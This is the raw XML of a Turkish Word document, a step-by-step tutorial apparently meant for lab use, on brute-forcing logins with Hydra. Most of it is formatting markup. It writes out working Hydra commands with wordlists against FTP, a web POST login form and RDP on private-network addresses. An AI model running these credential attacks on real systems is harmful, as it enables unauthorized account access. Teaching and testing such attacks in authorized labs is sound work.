      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>wordlists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">/rockyou.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="0086412D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          </w:rPr>
          <w:t>ftp://192.168.1.20</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6916C92E" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1226E66E" w14:textId="5AB8FDA2" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E714DC" wp14:editId="696D778E">
            <wp:extent cx="5511800" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="145678053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80536" name="Resim 1456780536"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5511800" cy="342900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4BA18C" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218ED096"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t>Adım 4: HTTP POST Form Üzerinden Saldırı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA136DD" w14:textId="77777777" w:rsidR="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59A2F2B0" w14:textId="29117423" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Web </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>arayüzlerde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> POST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> formuna saldırı için:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101FF49F" w14:textId="05799F52" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">“ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P passwords.txt 192.168.1.30 http-post-form "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>login.php:user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>=^USER^&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>=^PASS^:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>Invalid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC28318" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576BD9A1" w14:textId="3B12F457" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61348199" wp14:editId="70F421FC">
            <wp:extent cx="5760720" cy="398145"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="125110302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3022" name="Resim 1251103022"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="398145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE85656" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2546EB03"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t>Adım 5: RDP Servisine Saldırı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2C7EAD" w14:textId="77777777" w:rsidR="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB01EE3" w14:textId="4CC26F16" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t 4 -V -f -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P passwords.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>://192.168.1.40</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B226A" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB895EA" w14:textId="182C9DD5" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02AFB45F" wp14:editId="14001A92">
            <wp:extent cx="5461000" cy="419100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="157121894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18948" name="Resim 1571218948"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5461000" cy="419100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45846C69" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F30E4AE" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0086412D" w:rsidRPr="0086412D">
      <w:head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0D9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D12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8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2D"/>
    <w:rsid w:val="00411558"/>
    <w:rsid w:val="005B72A9"/>
    <w:rsid w:val="007F3392"/>
    <w:rsid w:val="008641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2066CCF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2ED28D1F-0F18-1D44-B273-DC6CBBB3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64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64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6412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86412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412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412D"/>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412D"/>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412D"/>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412D"/>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412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6412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6412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86412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412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412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412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412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412D"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="KonuBal">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="KonuBalChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="0086412D"/>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412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412D"/>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412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412D"/>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86412D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListeParagraf">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0086412D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="GlVurgulama">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="0086412D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="GlAlnt">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="GlAlntChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00864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412D"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="GlBavuru">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="0086412D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p1">
    <w:name w:val="p1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0086412D"/>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s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="0086412D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0086412D"/>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apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:rsid w:val="0086412D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Kpr">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0086412D"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="zmlenmeyenBahsetme">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0086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2093">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="810363386">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="990254514">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1324239647">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1429422750">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1576430031">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1594045156">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2003388993">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2075741173">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="210607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192.168.1.2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Hoşgör</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ozan Hoşgör</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-04T07:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-04T07:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>